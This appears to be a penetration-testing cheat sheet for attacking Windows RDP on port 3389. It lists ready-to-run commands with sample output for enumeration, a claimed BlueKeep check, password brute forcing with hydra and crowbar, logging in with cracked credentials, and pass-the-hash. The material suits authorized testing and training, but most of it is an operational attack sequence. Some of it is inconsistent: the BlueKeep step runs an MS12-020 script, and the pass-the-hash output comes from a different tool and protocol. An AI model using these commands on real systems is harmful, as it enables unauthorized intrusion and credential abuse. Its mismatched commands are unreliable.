RDP (3389)
Check if accessible
RDP enum scripts — Version, encryption, NLA
nmap --script rdp-* -p 3389 $IP
Example Output
nmap --script rdp-* -p 3389 10.10.10.5
| rdp-ntlm-info:
| Target: TARGET
| DNS: target.corp.local
| OS: Windows Server 2019
| NLA: Enabled
BlueKeep check
CVE-2019-0708 — Pre-auth RCE if unpatched
nmap --script rdp-vuln-ms12-020 -p 3389 $IP
Example Output
| rdp-vuln-ms12-020:
| VULNERABLE:
| CVE:CVE-2019-0708
(Pre-auth RCE, use with caution - may BSOD)
Brute force
With known usernames — Weak passwords
hydra -l <user> -P passwords.txt rdp://$IP
Example Output
hydra -l administrator -P passwords.txt rdp://10.10.10.5
[3389][rdp] host: 10.10.10.5 login: administrator password: Winter2025!
OR: crowbar -b rdp -s 10.10.10.5/32 -u admin -C passwords.txt
(crowbar is more reliable for RDP brute force)
Connect with found creds
Or rdesktop — Full GUI access
xfreerdp /u:<user> /p:<pass> /v:$IP
Example Output
xfreerdp /u:admin /p:Password123 /v:10.10.10.5
[INFO] Connected to 10.10.10.5:3389
(Full GUI desktop access)
Pass the hash
If you have NTLM hash — No password needed
xfreerdp /u:<user> /pth:<hash> /v:$IP
Example Output
crackmapexec smb 10.10.10.20 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
SMB 10.10.10.20 445 WEB01 [+] CORP\administrator:... (Pwn3d!)
(Admin access with just the hash)